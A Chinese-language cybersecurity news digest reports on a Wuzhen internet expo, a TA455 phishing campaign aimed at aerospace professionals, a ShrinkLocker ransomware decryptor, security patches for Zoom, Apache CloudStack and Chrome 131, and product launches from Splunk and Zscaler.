![](https://mmbiz.qpic.cn/mmbiz_gif/huXmkb12LiaK4J19rzVWNVvxic9tpqrWad4aon6RmYicuu94zLiaxibDn1NtoXbBriaibSUd2egTM6Z2nlOib3knFhNasA/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "")
**新闻速览**
•世界互联网大会“互联网之光”博览会“网络安全主题展”11月19日开展
•黑客组织假冒猎头瞄准航空航天人才实施针对性钓鱼攻击
•研究人员成功破解利用BitLocker加密的新型勒索软件
•远程代码执行风险威胁用户安全Zoom紧急修复多个安全漏洞
•KVM基础架构曝高危漏洞Apache CloudStack项目发布紧急修复
•Google正式发布Chrome 131稳定版修复多个关键安全漏洞
•Splunk发布新一代可观测性解决方案全面提升业务洞察能力
•颠覆传统安全架构Zscaler创新发布新型零信任分段方案
**特别关注**
**世界互联网大会“互联网之光”博览会“网络安全主题展”11月19日开展**
2024年世界互联网大会“互联网之光”博览会将于11月19日至22日在浙江乌镇举行。本届“网络安全主题展”贯彻落实总体国家安全观和党的二十届三中全会精神设置了“独立特装展”“国家网络安全教育技术产业融合发展试验区成果展”“网络安全学院成果展”“网络安全综合性成果展”等展区相比前几届主题更加鲜明内容更加丰富。
一、时间及地点
11月19日至22日
乌镇互联网国际会展中心展览中心3号展厅互联网之光博览会B3馆
二、主办单位
中国网络空间安全协会
三、特别支持单位
国家电网有限公司、中国移动通信集团公司、中国联合网络通信集团有限公司、云网基础设施安全国家工程研究中心、长安通信科技有限责任公司、奇安信科技集团股份有限公司、天融信科技集团股份有限公司
杭州安恒信息技术股份有限公司、网宿科技股份有限公司
 
原文链接:
https://mp.weixin.qq.com/s/O1fBaJN93WtmmIR8CMrtKA
**网络攻击**
**黑客组织假冒猎头瞄准航空航天人才实施针对性钓鱼攻击**
ClearSky安全研究机构最新披露黑客组织TA455自2023年9月以来在LinkedIn等社交平台上发起了一轮针对性网络钓鱼攻击其主要目标为航空航天领域的专业人士。
据ClearSky分析攻击者通过伪装成航空航天行业的招聘顾问与目标建立联系后在获得受害者信任后诱导对方下载一个名为"SIgnedConnection.zip"的压缩包并提供PDF指南诱导受害者"安全"地下载和打开这些文件。
技术分析显示该压缩包中包含的可执行文件会通过DLL侧加载技术向受害者设备植入恶意程序。具体而言攻击者通过加载名为"secure32.dll"的
DLL文件实现在目标系统中运行隐蔽代码。随后恶意程序会启动感染链最终部署Snail Resin恶意软件并开启一个名为"SlugResin"的后门。
为规避检测该组织采用了多种高级对抗技术一方面在GitHub平台上对命令控制C2通信进行编码使传统检测工具难以识别威胁另一方面模仿Lazarus Group的攻击特征造成归因困难。
原文链接:
https://www.darkreading.com/cyberattacks-data-breaches/iranian-cybercriminals-aerospace-workers-linkedin
**研究人员成功破解利用BitLocker加密的新型勒索软件**
Bitdefender安全公司日前发布了针对ShrinkLocker勒索软件的解密工具。这款勒索软件利用Windows内置的
BitLocker驱动器加密工具来锁定受害者文件此次发布的解密工具可以帮助受害者免费恢复被加密的数据。
尽管ShrinkLocker的勒索技术实现相对简单但其破坏性不容小觑。ShrinkLocker的技术手段并不高明不同于传统勒索软件使用自定义加密实现而是利用Windows BitLocker并生成随机密码发送给攻击者。攻击过程首先通过Windows Management InstrumentationWMI查询检查目标系统是否安装了BitLocker随后攻击者会移除所有默认保护机制并使用"-UsedSpaceOnly"参数仅加密磁盘已使用空间以提高效率。该勒索软件使用网络流量和内存使用数据生成随机密码使暴力破解变得困难同时删除和重新配置所有BitLocker保护器增加加密密钥恢复的难度。
Bitdefender的解密工具通过识别BitLocker加密磁盘删除保护器后的特定恢复窗口成功实现了攻击者设置的密码恢复。受害者可以通过USB驱动器使用该工具在BitLocker恢复界面进入恢复模式通过高级选项访问命令提示符来启动解密工具。
原文链接:
https://www.bleepingcomputer.com/news/security/new-shrinklocker-ransomware-decryptor-recovers-bitlocker-password/
**漏洞预警**
**远程代码执行风险威胁用户安全Zoom紧急修复多个安全缺陷**
近日Zoom官方修复了其应用程序套件中存在多个安全缺陷其中最严重的缺陷可能允许攻击者执行远程代码。这些漏洞影响范围广泛涉及Windows、macOS、iOS、Android和Linux等多个平台的Zoom产品。
其中最严重的是一个缓冲区溢出缺陷CVSS评分高达8.5。该缺陷可能允许已认证用户通过网络访问提升权限进而执行远程代码。受影响的产品包括Zoom Workplace App、Rooms Client、Video SDK和Meeting SDK等核心应用。还有一个严重缺陷涉及输入验证不当问题。可能使未经身份验证的用户通过网络访问泄露敏感信息。
此外Zoom还披露了多个中等严重级别的安全缺陷涉及输入验证不当可能导致拒绝服务攻击、资源消耗控制不当可能引发拒绝服务、macOS安装程序中的符号链接跟随缺陷以及macOS安装程序中的资源消耗控制不当可能导致信息泄露等问题。
这些漏洞主要影响6.2.0版本之前的大多数产品部分macOS特定漏洞存在于6.1.5版本之前。Zoom建议用户通过官方网站更新到最新版本以防范潜在的漏洞利用。
原文链接:
https://cybersecuritynews.com/zoom-app-vulnerability/
**KVM基础架构曝高危漏洞Apache CloudStack项目发布紧急修复**
Apache CloudStack项目日前发布重要安全更新修复了其KVM基础架构中的严重漏洞CVE-2024-50386。此次发布的
LTS安全版本4.18.2.5和4.19.1.3修补了一个可能允许攻击者入侵KVM环境的重大缺陷。
该漏洞CVSS v3.1基准评分为8.5高危影响Apache CloudStack 4.0.0至4.18.2.4版本以及4.19.0.0至4.19.1.2版本。安全问题源于模板注册过程中缺少对KVM兼容模板的验证检查。攻击者可能通过利用此漏洞部署恶意实例进而未经授权访问主机文件系统危及CloudStack管理的KVM基础架构的完整性、机密性和可用性。
为降低风险CloudStack强烈建议管理员立即升级至修补版本4.18.2.5、4.19.1.3或更高版本。运行4.19.1.0之前版本的用户应跳过中间更新直接升级至4.19.1.3。同时CloudStack还为管理员提供了扫描和验证现有KVM兼容模板的指导包括在基于文件的主存储上运行特定命令以识别潜在受损磁盘。
 
原文链接:
https://cybersecuritynews.com/critical-kvm-infrastructure-vulnerabilities/
**Google正式发布Chrome 131稳定版修复多个关键安全漏洞**
Google公司日前发布了Chrome 131稳定版针对Windows、Mac和Linux平台修复了12个安全漏洞其中包括多个高危和中危漏洞。该更新将在未来数周内陆续推送。
在此次修复的漏洞中最严重的是由Solidlab公司的Vsevolod Kokorin发现的一个高危漏洞CVE-2024-11110。该漏洞与
Chrome浏览器渲染引擎Blink中的不当实现有关。
其他重要修复还包括自动填充实现缺陷CVE-2024-11111、媒体组件中的释放后使用漏洞CVE-2024-11112、无障碍功能中的释放后使用问题CVE-2024-11113、Views组件中的不当实现CVE-2024-11114以及导航功能中的策略执行不足CVE-2024-11115。此外Chrome安全团队还解决了一个长期存在的绘制实现问题CVE-2024-11116和一个低危的文件系统实现漏洞CVE-2024-11117
为确保大多数用户能在潜在漏洞利用代码公开前完成更新Google限制了部分漏洞细节的访问权限。Google建议用户尽快更新浏览器以防范安全风险。用户可以通过Chrome设置中的"关于Chrome"选项手动检查并安装最新版本。
原文链接:
https://cybersecuritynews.com/chrome-131-released/
**行业动态**
**Splunk发布新一代可观测性解决方案全面提升业务洞察能力**
Splunk公司日前宣布全面升级其可观测性产品组合通过Splunk AppDynamics的技术支持帮助IT运维和工程团队更快速地发现和解决性能问题为组织提供更强大的业务运营性能可视化能力。
在当今混合和现代化环境下许多组织面临技术基础设施可视性分散的挑战这严重影响了其理解性能对运营影响的能力。Splunk可观测性产品负责人Patrick Lin表示注入更完整的业务上下文信息是克服当今混合现代环境中分散可视性和安全盲点的关键。Splunk的可观测性产品组合在AppDynamics的加持下能够为客户提供必要的业务上下文帮助其了解问题的根源及其影响范围。
此次升级的核心点包括:
- 将Cisco AppDynamics整合入Splunk可观测性产品组合实现跨环境的统一体验
- 引入单点登录、增强用户界面并推出Log Observer Connect功能将Splunk AppDynamics的可视化与Splunk平台上的详细日志关联起来
- 通过AI增强和基础设施监控来减少故障排查工作量为ITOps团队提供更有效的工具简化环境导航和深入分析流程。
原文链接:
https://www.sdxcentral.com/articles/stringerai-announcements/splunk-enhances-observability-portfolio-for-better-business-insights/2024/11/
**颠覆传统安全架构Zscaler创新发布新型零信任分段方案**
Zscaler公司宣布正式推出行业创新的零信任分段解决方案通过创新技术打造更安全、高效的连接方案以应对分布式环境下日益复杂的网络安全挑战。
在数字化转型浪潮中企业业务遍布各地分支机构、数据中心和云平台传统的防火墙、VPN和SD-WAN等安全方案不仅成本高昂且复杂还可能无意中扩大了攻击面特别是在应对勒索软件时。
Zscaler的零信任分段方案将零信任原则扩展到分支机构、工厂和公有云等多样化环境。该解决方案将每个位置转变为安全隔离的"孤岛"通过云实现无缝通信无需复杂的基于硬件的防护。系统通过Zero Trust Exchange云平台在设备和工作负载层面实施基于云的分段每个分支或位置作为独立的网络实体仅通过执行特定业务策略的受控安全通道进行通信。
IIFL首席信息安全官Shanker Ramrakhiani对此表示Zscaler的零信任云使他们能够在数据中心和多个云环境中执行一致的安全策略简化运营并显著降低横向威胁移动的风险。
原文链接:
https://cybermagazine.com/articles/zscaler-powering-a-new-era-of-zero-trust-with-segmentation